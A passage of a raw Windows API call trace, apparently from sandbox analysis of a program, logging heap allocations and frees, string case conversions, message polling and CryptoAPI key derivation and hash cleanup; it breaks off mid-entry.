RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0263.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0263.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0263.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0263.620] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.620] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0263.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0263.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0263.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0263.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0263.621] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.621] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.621] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0263.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0263.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0263.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0263.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0263.621] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0263.621] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0263.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0263.621] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0263.621] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.622] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.622] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.622] CryptDeriveKey (in: hProv=0xad2be8, Algid=0x6601, hBaseData=0xaa57a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5860) returned 1 [0263.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0263.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0263.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0263.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0263.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0263.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0263.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0263.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0263.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0263.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0263.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0263.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0263.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0263.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0263.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0263.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0263.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0263.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0263.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0263.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0263.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0263.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0263.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0263.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0263.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0263.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0263.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0263.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0263.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0263.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0263.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0263.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0263.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0263.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0263.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0263.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0263.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0263.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0263.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0263.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0263.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0263.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0263.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0263.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0263.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0263.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0263.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0263.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0263.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0263.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0263.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0263.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0263.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0263.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0263.626] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0263.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0263.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0263.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0263.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0263.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0263.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0263.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0263.626] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0263.626] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0263.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0263.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0263.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0263.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0263.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0263.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.627] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0263.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0263.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0263.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0263.627] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0263.628] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0263.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0263.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0263.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0263.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0263.628] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0263.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.628] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0263.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.628] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0263.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0263.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.629] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0263.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0263.629] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0263.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0263.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0263.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0263.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0263.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.630] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0263.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0263.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0263.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0263.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0263.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0263.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0263.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0263.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0263.631] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0263.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0263.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0263.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0263.631] CryptDestroyHash (hHash=0xaa57a0) returned 1 [0263.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0263.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0263.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0263.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0263.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0263.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0263.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0263.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0263.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0263.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0263.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0263.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0263.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0263.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0263.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0263.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0263.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0263.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0263.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0263.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0263.633] HeapFree (in: hHeap=0x25c0000, 